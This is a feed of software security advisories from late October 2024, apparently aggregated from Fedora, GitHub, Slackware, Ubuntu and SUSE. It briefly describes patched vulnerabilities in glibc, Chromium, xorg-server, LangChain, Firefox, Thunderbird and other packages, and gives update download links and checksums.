misc: Add support for Linux uio.h RWF_NOAPPEND flag
i386: Disable Intel Xeon Phi tests for GCC 15 and above (BZ 31782)
Force DT_RPATH for --enable-hardcoded-path-in-tests
resolv: Fix some unaligned accesses in resolver [BZ #30750]
nscd: Use time_t for return type of addgetnetgrentX
elf: Also compile dl-misc.os with $(rtld-early-cflags)
CVE-2024-33601, CVE-2024-33602: nscd: netgroup: Use two buffers in addgetnetgrentX (bug 31680)
CVE-2024-33600: nscd: Avoid null pointer crashes after notfound response (bug 31678)
CVE-2024-33600: nscd: Do not send missing not-found response in addgetnetgrentX (bug 31678)
CVE-2024-33599: nscd: Stack-based buffer overflow in netgroup cache (bug 31677)
i386: ulp update for SSE2 --disable-multi-arch configurations
nptl: Fix tst-cancel30 on kernels without ppoll_time64 support
login: structs utmp, utmpx, lastlog _TIME_BITS independence (bug 30701)
login: Check default sizes of structs utmp, utmpx, lastlog
sparc: Remove 64 bit check on sparc32 wordsize (BZ 27574)

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-df41d584d0
27.10.2024 22:34:42 | fedora | [FEDORA-2024-1178c53bb1] Fedora 41: chromium

update to 130.0.6723.69
* High CVE-2024-10229: Inappropriate implementation in Extensions
* High CVE-2024-10230: Type Confusion in V8
* High CVE-2024-10231: Type Confusion in V8

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1178c53bb1

27.10.2024 22:34:10 | fedora | [FEDORA-2024-28e375f8ca] Fedora 41: prometheus-podman-exporter | release 1.13.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-28e375f8ca
27.10.2024 22:34:09 | fedora | [FEDORA-2024-1cab90a9e7] Fedora 41: podman-tui | release 1.2.3 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1cab90a9e7
29.10.2024 21:40:08 | npm | [NPM:GHSA-HC5W-C9F8-9CC4] Langchain Path Traversal vulnerability (moderate) | A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HC5W-C9F8-9CC4
29.10.2024 21:38:30 | npm | [NPM:GHSA-6M59-8FMV-M5F9] @langchain/community SQL Injection vulnerability (low) | A vulnerability in the GraphCypherQAChain class of langchain-ai/langchainjs versions 0.2.5 and all versions with this class allows for prompt injection, leading to SQL injection. This vulnerability permits unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6M59-8FMV-M5F9
29.10.2024 23:33:11 | maven | [MAVEN:GHSA-7MQJ-XGF8-P59V] Apache NiFi Cross-site Scripting vulnerability (moderate) | Apache NiFi 1.10.0 through 1.27.0 and 2.0.0-M1 through 2.0.0-M3 support a description field for Parameters in a Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.28.0 or 2.0.0-M4 is the recommended mitigation. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7MQJ-XGF8-P59V
29.10.2024 14:38:06 | almalinux | [ALSA-2024:8563] buildah security update (important) | buildah security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:8563

28.10.2024 21:44:11 | maven | [MAVEN:GHSA-J945-C44V-97G6] MPXJ has a Potential Path Traversal Vulnerability (moderate)

### Impact

The patch for the historical vulnerability CVE-2020-35460 in MPXJ is incomplete as there is still a possibility that a malicious path could be constructed which would not be picked up by the original fix and allow files to be written to arbitrary locations.

### Patches

The issue is addressed in MPXJ version 13.5.1

### Workarounds

Do not pass zip files to MPXJ.

### References

N/A

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J945-C44V-97G6

28.10.2024 19:59:30 | maven | [MAVEN:GHSA-C4Q5-6C82-3QPW] Spring Security vulnerable to Authorization Bypass of Static Resources in WebFlux Applications (critical)

Spring WebFlux applications that have Spring Security authorization rules on static resources can be bypassed under certain circumstances.

For this to impact an application, all of the following must be true:
* It must be a WebFlux application
* It must be using Spring's static resources support
* It must have a non-permitAll authorization rule applied to the static resources support

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C4Q5-6C82-3QPW

28.10.2024 05:55:00 | fedora | [FEDORA-2024-f1117faa03] Fedora 40: chromium (high)

update to 130.0.6723.69
* High CVE-2024-10229: Inappropriate implementation in Extensions
* High CVE-2024-10230: Type Confusion in V8
* High CVE-2024-10231: Type Confusion in V8

https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f1117faa03

28.10.2024 17:05:27 | npm | [NPM:GHSA-HXF3-VGPM-FV9P] CycloneDX cdxgen may execute code contained within build-related files (moderate) | CycloneDX cdxgen through 10.10.7, when run against an untrusted codebase, may execute code contained within build-related files such as build.gradle.kts, a similar issue to CVE-2022-24441. cdxgen is used by, for example, OWASP dep-scan. NOTE: this has been characterized as a design limitation, rather than an implementation mistake. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HXF3-VGPM-FV9P
28.10.2024 17:01:52 | npm | [NPM:GHSA-MGFV-M47X-4WQP] useragent Regular Expression Denial of Service vulnerability (moderate) | Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MGFV-M47X-4WQP
28.10.2024 16:56:39 | npm | [NPM:GHSA-3PHV-83CJ-P8P7] nope-validator Regular Expression Denial of Service vulnerability (moderate) | Nope is a JavaScript validator. Versions 0.11.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). This vulnerability is fixed in 0.12.1. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3PHV-83CJ-P8P7
28.10.2024 16:51:34 | npm | [NPM:GHSA-RV73-9C8W-JP4C] validate.js Regular Expression Denial of Service vulnerability (moderate) | Validate.js provides a declarative way of validating javascript objects. Versions 0.13.1 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RV73-9C8W-JP4C
28.10.2024 16:50:19 | npm | [NPM:GHSA-68QG-G787-3RP5] Knwl.js Regular Expression Denial of Service vulnerability (moderate) | Knwl.js is a Javascript library that parses through text for dates, times, phone numbers, emails, places, and more. Versions 1.0.2 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68QG-G787-3RP5
28.10.2024 16:44:58 | npm | [NPM:GHSA-PMVV-57RG-5G86] CommonRegexJS Regular Expression Denial of Service vulnerability (moderate) | CommonRegexJS is a CommonRegex port for JavaScript. All available versions contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-PMVV-57RG-5G86
28.10.2024 16:44:07 | npm | [NPM:GHSA-P8PC-3F7W-JR5Q] Foundation Regular Expression Denial of Service vulnerability (moderate) | Foundation is a front-end framework. Versions 6.3.3 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, it is unknown if any fixes are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P8PC-3F7W-JR5Q
28.10.2024 16:40:04 | npm | [NPM:GHSA-W455-MFQ9-HF74] insane vulnerable to Regular Expression Denial of Service (moderate) | insane is a whitelist-oriented HTML sanitizer. Versions 2.6.2 and prior contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no known patches are available. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W455-MFQ9-HF74
31.10.2024 04:15:28 | fedora | [FEDORA-2024-dee1ef052e] Fedora 40: firefox | New upstream update (132.0) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dee1ef052e
31.10.2024 04:15:18 | fedora | [FEDORA-2024-f9ca680ecd] Fedora 40: micropython | Update to 1.23.0 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f9ca680ecd
31.10.2024 04:15:17 | fedora | [FEDORA-2024-e88cc97dba] Fedora 40: NetworkManager-libreswan | This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPN plugin for NetworkManager. It fixes a local privilege escalation bug due to improper escaping of Libreswan configuration. (CVE-2024-9050) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e88cc97dba
31.10.2024 03:38:49 | fedora | [FEDORA-2024-d20b38c63f] Fedora 39: NetworkManager-libreswan | This is an update to 1.2.24 release of NetworkManager-libreswan, the IPSec VPN plugin for NetworkManager. It fixes a local privilege escalation bug due to improper escaping of Libreswan configuration. (CVE-2024-9050) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d20b38c63f
31.10.2024 03:38:49 | fedora | [FEDORA-2024-9c81ad492a] Fedora 39: micropython | Update to 1.23.0 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9c81ad492a
31.10.2024 03:38:44 | fedora | [FEDORA-2024-ab6348928b] Fedora 39: libarchive | Fix for CVE-2024-48957 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ab6348928b
31.10.2024 03:38:31 | fedora | [FEDORA-2024-24fbd327e3] Fedora 41: firefox | New upstream update (132.0) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-24fbd327e3
31.10.2024 03:38:29 | fedora | [FEDORA-2024-80c8f31c55] Fedora 41: xorg-x11-server-Xwayland | xwayland 24.1.4 - CVE fix for CVE-2024-9632 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-80c8f31c55
31.10.2024 03:38:17 | fedora | [FEDORA-2024-cd5c1dfa94] Fedora 41: micropython | Update to 1.23.0 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-cd5c1dfa94
31.10.2024 00:05:02 | slackware | [SSA:2024-304-04] xorg-server (high)
New xorg-server packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/xorg-server-1.20.14-i586-14_slack15.0.txz: Rebuilt.
  This update fixes a security issue:
  By providing a modified bitmap, a heap-based buffer overflow may occur.
  This may lead to local privilege escalation if the server is run as root
  or remote code execution (e.g. x11 over ssh).
  This vulnerability was discovered by:
  Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
  For more information, see:
    https://lists.x.org/archives/xorg-announce/2024-October/003545.html
    https://www.cve.org/CVERecord?id=CVE-2024-9632
  (* Security fix *)
patches/packages/xorg-server-xephyr-1.20.14-i586-14_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xnest-1.20.14-i586-14_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xvfb-1.20.14-i586-14_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xwayland-21.1.4-i586-12_slack15.0.txz: Rebuilt.
  This update fixes a security issue:
  By providing a modified bitmap, a heap-based buffer overflow may occur.
  This may lead to local privilege escalation if the server is run as root
  or remote code execution (e.g. x11 over ssh).
  This vulnerability was discovered by:
  Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
  For more information, see:
    https://lists.x.org/archives/xorg-announce/2024-October/003545.html
    https://www.cve.org/CVERecord?id=CVE-2024-9632
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-12_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-14_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-12_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.14-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.14-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.14-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.14-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-24.1.4-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.14-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.14-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.14-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.14-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-24.1.4-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
eebd5cd981a537e02a09d813ced19ede  xorg-server-1.20.14-i586-14_slack15.0.txz
ddd8ecbb735d3e347702d5008094efb1  xorg-server-xephyr-1.20.14-i586-14_slack15.0.txz
76f253a5a048a23110b447f5ae292f3e  xorg-server-xnest-1.20.14-i586-14_slack15.0.txz
ce54ae9c7368ecc60be96c50e93c26a3  xorg-server-xvfb-1.20.14-i586-14_slack15.0.txz
c0e7639ea5b69966c2df52efc658b55c  xorg-server-xwayland-21.1.4-i586-12_slack15.0.txz

Slackware x86_64 15.0 package:
efa602268277e4b7838f04c52352e5d2  xorg-server-1.20.14-x86_64-14_slack15.0.txz
2290325db04ba991244e1db34b6039e5  xorg-server-xephyr-1.20.14-x86_64-14_slack15.0.txz
9dfe708add6b47877fa76bfc7ecdbbb0  xorg-server-xnest-1.20.14-x86_64-14_slack15.0.txz
f9a9222328fe88bf81f446ef8a77c066  xorg-server-xvfb-1.20.14-x86_64-14_slack15.0.txz
99523a7eca2c145d269b65cbad18bf75  xorg-server-xwayland-21.1.4-x86_64-12_slack15.0.txz

Slackware -current package:
8d6aa07b319d2aef7eabb667000828fc  x/xorg-server-21.1.14-i686-1.txz
c92414cd5b46a14cefe2207fa66b311d  x/xorg-server-xephyr-21.1.14-i686-1.txz
67a0bcf3041c78cbd6a4971502fb6261  x/xorg-server-xnest-21.1.14-i686-1.txz
16dc00c9cb9bf872fc287319ade2abe4  x/xorg-server-xvfb-21.1.14-i686-1.txz
1622be5d7be614fd784519869a665e76  x/xorg-server-xwayland-24.1.4-i686-1.txz

Slackware x86_64 -current package:
7e36599b3810e2066afef71c5c6c7511  x/xorg-server-21.1.14-x86_64-1.txz
4347494b4a665a3d3b2901fe6340d28f  x/xorg-server-xephyr-21.1.14-x86_64-1.txz
2490efadbfb293db40891f48068e1ce8  x/xorg-server-xnest-21.1.14-x86_64-1.txz
175fde9e0f27767bf96659b1ac3c0230  x/xorg-server-xvfb-21.1.14-x86_64-1.txz
91929af00bfe32aa554b2c06754cb792  x/xorg-server-xwayland-24.1.4-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg xorg-server-*.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-04

31.10.2024 00:04:41 | slackware | [SSA:2024-304-03] mozilla-thunderbird (critical)
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/128.4.0esr/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-58/
    https://www.cve.org/CVERecord?id=CVE-2024-10458
    https://www.cve.org/CVERecord?id=CVE-2024-10459
    https://www.cve.org/CVERecord?id=CVE-2024-10460
    https://www.cve.org/CVERecord?id=CVE-2024-10461
    https://www.cve.org/CVERecord?id=CVE-2024-10462
    https://www.cve.org/CVERecord?id=CVE-2024-10463
    https://www.cve.org/CVERecord?id=CVE-2024-10464
    https://www.cve.org/CVERecord?id=CVE-2024-10465
    https://www.cve.org/CVERecord?id=CVE-2024-10466
    https://www.cve.org/CVERecord?id=CVE-2024-10467
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-128.4.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.4.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.4.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
8202f1f4a0aa23bde158c8f1d8d15a63  mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
389ffb2ecb9bca6b5c6207667e655eb0  mozilla-thunderbird-128.4.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
d46ad813909083e0d31a5ee7f53f9356  xap/mozilla-thunderbird-128.4.0esr-i686-1.txz

Slackware x86_64 -current package:
6d22276ef05d2e25e48d04088e2f4e98  xap/mozilla-thunderbird-128.4.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-128.4.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-03

31.10.2024 00:04:18 | slackware | [SSA:2024-304-02] mozilla-firefox (critical)
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/128.4.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-56/
    https://www.cve.org/CVERecord?id=CVE-2024-10458
    https://www.cve.org/CVERecord?id=CVE-2024-10459
    https://www.cve.org/CVERecord?id=CVE-2024-10460
    https://www.cve.org/CVERecord?id=CVE-2024-10461
    https://www.cve.org/CVERecord?id=CVE-2024-10462
    https://www.cve.org/CVERecord?id=CVE-2024-10463
    https://www.cve.org/CVERecord?id=CVE-2024-10464
    https://www.cve.org/CVERecord?id=CVE-2024-10465
    https://www.cve.org/CVERecord?id=CVE-2024-10466
    https://www.cve.org/CVERecord?id=CVE-2024-10467
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-128.4.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.4.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.4.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
1383dcc633cb74b1167429a7cd2891b2  mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
91ebb71315bb3d82fe22f8cda6797957  mozilla-firefox-128.4.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
54b2409055d53beb2d5ac5ae0b2f5f53  xap/mozilla-firefox-128.4.0esr-i686-1.txz

Slackware x86_64 -current package:
f0a0567ca70fb99ab2fd8dfd61d98d82  xap/mozilla-firefox-128.4.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-128.4.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-02

31.10.2024 00:03:51 | slackware | [SSA:2024-304-01] tigervnc (high)
New tigervnc packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
extra/tigervnc/tigervnc-1.12.0-i586-7_slack15.0.txz: Rebuilt.
  Recompiled against xorg-server-1.20.14, including a patch for a security issue:
  By providing a modified bitmap, a heap-based buffer overflow may occur.
  This may lead to local privilege escalation if the server is run as root
  or remote code execution (e.g. x11 over ssh).
  This vulnerability was discovered by:
  Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
  For more information, see:
    https://lists.x.org/archives/xorg-announce/2024-October/003545.html
    https://www.cve.org/CVERecord?id=CVE-2024-9632
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-7_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-7_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.14.1-i686-2.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.14.1-x86_64-2.txz

**MD5 signatures**

Slackware 15.0 package:
be3a49072d40d88679fe7e99a7558c42  tigervnc-1.12.0-i586-7_slack15.0.txz

Slackware x86_64 15.0 package:
497891bf3f14426d6456314d8fb0bff0  tigervnc-1.12.0-x86_64-7_slack15.0.txz

Slackware -current package:
0dbde067502e39c711e3ccd372c369a4  tigervnc-1.14.1-i686-2.txz

Slackware x86_64 -current package:
0375267af2e5bdc5c11acb9b9693f258  tigervnc-1.14.1-x86_64-2.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg tigervnc-1.12.0-i586-7_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-304-01

30.10.2024 23:50:28 | maven | [MAVEN:GHSA-F686-HW9C-XW9C] Snowflake JDBC Security Advisory (moderate)

### Impacted Products

Snowflake JDBC driver versions >= 3.2.6 & <= 3.19.1 are affected.

### Introduction

Snowflake recently identified an issue affecting JDBC drivers that can result in data being uploaded to an encrypted stage without the additional layer of protection provided by client side encryption. The issue, which affects only a subset of accounts hosted on Azure and GCP deployments (AWS deployments are not affected), manifests in instances where customers create a stage using a JDBC driver with the CLIENT_ENCRYPTION_KEY_SIZE account parameter set to 256-bit rather than the default 128-bit. The data is still protected by TLS in transit and server side encryption at rest. This missed layer of additional protection is not visible to the affected customers.

### Incorrect Security Setting Vulnerability

#### Description

Snowflake identified an incorrect security setting in Snowflake JDBC drivers. Snowflake has evaluated the severity of the issue and determined it was in the medium range, with a maximum CVSSv3 base score of 5.9.

#### Scenarios and attack vector(s)

Users of Snowflake JDBC drivers with accounts on Azure and GCP deployments who set the parameter CLIENT_ENCRYPTION_KEY_SIZE = 256 were subject to this incorrect security setting vulnerability, as it could result in data being uploaded to a stage without the additional layer of encryption.

#### Our response

On July 23, 2024, Snowflake discovered this vulnerability. On 10/28/2024, Snowflake released a patch in Snowflake JDBC driver Version 3.20.0. The patch fixes the incorrect security setting.

#### Resolution

We strongly recommend that users upgrade to 3.20.0 or a later version as soon as possible.

### Contact

If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F686-HW9C-XW9C

30.10.2024 15:21:06 | ubuntu | [USN-7085-2] X.Org X Server vulnerability (high) | X.Org X Server could be made to crash or run programs if it received specially crafted data. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7085-2
30.10.2024 13:55:54 | ubuntu | [USN-7084-2] pip vulnerability (medium) | urllib3 could leak sensitive information. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7084-2
30.10.2024 10:52:22 | ubuntu | [USN-7085-1] X.Org X Server vulnerability (high) | X.Org X Server could be made to crash or run programs if it received specially crafted data. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7085-1
01.11.2024 04:45:00 | fedora | [FEDORA-2024-275a45a146] Fedora 40: xorg-x11-server-Xwayland | xwayland 24.1.4 - CVE fix for CVE-2024-9632 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-275a45a146
31.10.2024 18:33:35 | suse | [SUSE-SU-2024:3860-1] Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 13 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3860-1
31.10.2024 17:50:57 | ubuntu | [USN-7088-1] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7088-1
31.10.2024 17:34:40 | suse | [SUSE-SU-2024:3859-1] Security update for the Linux Kernel (Live Patch 7 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 7 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3859-1
31.10.2024 17:04:04 | suse | [SUSE-SU-2024:3857-1] Security update for the Linux Kernel (Live Patch 14 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 14 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3857-1
31.10.2024 16:33:36 | suse | [SUSE-SU-2024:3856-1] Security update for the Linux Kernel RT (Live Patch 17 for SLE 15 SP5) (important) | Security update for the Linux Kernel RT (Live Patch 17 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3856-1
31.10.2024 19:03:42 | npm | [NPM:GHSA-P3VF-V8QC-CWCR] DOMPurify vulnerable to tampering by prototype pollution (critical) | dompurify was vulnerable to prototype pollution. Fixed by https://github.com/cure53/DOMPurify/commit/d1dd0374caef2b4c56c3bd09fe1988c3479166dc | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P3VF-V8QC-CWCR
31.10.2024 15:04:33 | ubuntu | [USN-7076-2] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7076-2
31.10.2024 14:07:48 | ubuntu | [USN-7021-5] Linux kernel vulnerabilities | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-5
31.10.2024 13:33:35 | suse | [SUSE-SU-2024:3855-1] Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5) (important) | Security update for the Linux Kernel (Live Patch 12 for SLE 15 SP5) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3855-1
31.10.2024 13:03:48 | suse | [SUSE-SU-2024:3854-1] Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP3) (important) | Security update for the Linux Kernel (Live Patch 44 for SLE 15 SP3) | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3854-1
31.10.2024 13:01:17 | suse | [SUSE-SU-2024:3853-1] Security update for uwsgi (moderate) | Security update for uwsgi | https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3853-1
